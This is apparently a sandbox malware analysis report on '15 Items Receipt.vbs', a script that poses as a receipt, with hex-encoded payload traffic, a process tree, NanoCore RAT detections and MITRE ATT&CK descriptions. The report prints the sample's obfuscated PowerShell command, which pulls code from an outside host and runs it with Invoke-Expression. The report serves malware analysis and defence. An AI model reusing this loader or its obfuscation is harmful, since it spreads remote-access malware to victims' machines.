2021-09-14 15:02:54 UTC	481	IN	Data Raw: 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 34 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 36 2d 33 34 2d 33 30 2d 33 32 2d 34 34 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 32 2d 33 31 2d 33 30 2d 33 33 2d 34 36 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 34 36 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 31 2d 33 30 2d 33 31 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 39 2d 33 30 2d 33 31 2d 34 36 Data Ascii: -46-33-30-33-42-32-30-30-44-31-30-30-46-33-30-33-46-34-30-32-44-39-30-30-46-33-30-33-42-32-30-30-45-31-30-30-46-33-30-33-32-31-30-33-46-31-30-30-46-33-30-33-33-30-30-33-46-39-30-30-46-33-30-33-33-30-30-33-30-31-30-31-46-33-30-33-33-30-30-33-30-39-30-31-46
2021-09-14 15:02:54 UTC	489	IN	Data Raw: 33 30 2d 33 35 2d 33 33 2d 33 37 2d 33 34 2d 33 37 2d 33 32 2d 33 36 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 30 2d 33 30 2d 33 36 2d 33 37 2d 33 36 2d 33 35 2d 33 37 2d 33 34 2d 33 35 2d 34 36 2d 33 34 2d 34 33 2d 33 36 2d 33 35 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 37 2d 33 34 2d 33 36 2d 33 38 2d 33 30 2d 33 30 2d 33 36 2d 33 39 2d 33 30 2d 33 30 2d 33 36 2d 34 31 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 37 2d 33 33 2d 33 37 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 33 2d 33 34 2d 33 33 2d 33 36 2d 33 31 2d 33 36 2d 34 33 2d 33 36 2d 34 33 2d 33 36 2d 33 32 2d 33 36 2d 33 31 2d 33 36 2d 33 33 2d 33 36 2d 34 32 2d 33 30 2d 33 30 2d 33 34 2d 34 34 2d 33 36 2d 33 31 2d 33 37 2d 33 32 2d 33 37 2d 33 33 2d 33 36 2d 33 38 2d 33 36 2d 33 31 2d Data Ascii: 30-35-33-37-34-37-32-36-39-36-45-36-37-30-30-36-37-36-35-37-34-35-46-34-43-36-35-36-45-36-37-37-34-36-38-30-30-36-39-30-30-36-41-30-30-34-31-37-33-37-39-36-45-36-33-34-33-36-31-36-43-36-43-36-32-36-31-36-33-36-42-30-30-34-44-36-31-37-32-37-33-36-38-36-31-
2021-09-14 15:02:54 UTC	496	IN	Data Raw: 30 2d 33 35 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 38 2d 33 30 2d 33 39 2d 33 30 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 33 2d 34 34 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 34 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 32 2d 33 Data Ascii: 0-35-30-38-30-34-30-30-30-31-30-38-30-39-30-35-30-30-30-31-31-32-33-44-30-38-30-34-30-41-30-31-31-32-30-43-30-34-30-41-30-31-31-32-31-30-30-34-30-41-30-31-31-32-31-34-30-34-30-41-30-31-31-32-31-38-30-34-30-41-30-31-31-32-31-43-30-34-30-41-30-31-31-32-32-3
2021-09-14 15:02:54 UTC	503	IN	Data Raw: 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 33 35 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 34 2d 33 30 2d 33 30 2d 33 37 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 32 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 39 2d 33 30 2d 33 30 2d 33 34 Data Ascii: -34-33-30-30-36-46-30-30-36-44-30-30-36-44-30-30-36-35-30-30-36-45-30-30-37-34-30-30-37-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-32-32-30-30-30-31-30-30-30-31-30-30-34-33-30-30-36-46-30-30-36-44-30-30-37-30-30-30-36-31-30-30-36-45-30-30-37-39-30-30-34
2021-09-14 15:02:54 UTC	510	IN	Data Raw: 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 34 2d 34 38 2d 33 36 2d 33 64 2d 32 30 2d 35 36 2d 34 39 2d 35 30 2d 32 30 2d 32 34 2d 34 38 2d 34 38 2d 30 61 2d 32 34 2d 36 31 2d 36 31 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 65 2d 34 35 2d 35 34 2d 32 65 2d 35 30 2d 34 35 2d 32 37 2d 30 61 2d 32 34 2d 36 32 2d 36 32 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 32 2d 36 31 2d 36 34 2d 36 37 2d 36 35 2d 37 32 2d 32 37 2d 30 61 2d 32 34 2d 36 66 2d 36 66 2d 32 30 2d 33 64 2d 32 37 2d 34 37 2d 36 35 2d 37 34 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 2d 32 37 2d 32 65 2d 35 32 2d 36 35 2d 37 30 2d 36 63 2d 36 31 2d 36 33 2d 36 35 2d 32 38 2d 32 32 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 2d Data Ascii: 79-74-65-5b-5d-5d-24-48-36-3d-20-56-49-50-20-24-48-48-0a-24-61-61-20-3d-20-27-4e-45-54-2e-50-45-27-0a-24-62-62-20-3d-20-27-42-61-64-67-65-72-27-0a-24-6f-6f-20-3d-27-47-65-74-48-49-53-54-4f-52-52-59-27-2e-52-65-70-6c-61-63-65-28-22-48-49-53-54-4f-52-52-59-

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 6280 Parent PID: 3472

General

Start time:	17:02:02
Start date:	14/09/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\15 Items Receipt.vbs'
Imagebase:	0x7ff6f0b70000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.416393768.0000022F43489000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.416548477.0000022F43568000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.417297816.0000022F4356A000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.417934002.0000022F45340000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.415037568.0000022F45341000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.417252969.0000022F4355A000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.416992002.0000022F4348A000.00000004.00000040.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6368 Parent PID: 6280

General

Start time:	17:02:03
Start date:	14/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('','6');Invoke-Expression (-join ($SOS -split '-X-' \| ? { $_ } \| % { [char][convert]::ToUInt32($_,16) }))
Imagebase:	0x7ff617cb0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000002.00000002.405872128.00000259CC2EA000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6408 Parent PID: 6368

General

Start time:	17:02:04
Start date:	14/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: aspnet_compiler.exe PID: 6860 Parent PID: 6368

General

Start time:	17:03:16
Start date:	14/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x320000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: aspnet_compiler.exe PID: 1012 Parent PID: 6368

General

Start time:	17:03:17
Start date:	14/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x3d0000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: aspnet_compiler.exe PID: 3092 Parent PID: 6368

General

Start time:	17:03:18
Start date:	14/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0xa70000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: NanoCore, Description: unknown, Source: 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 15 Items Receipt.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre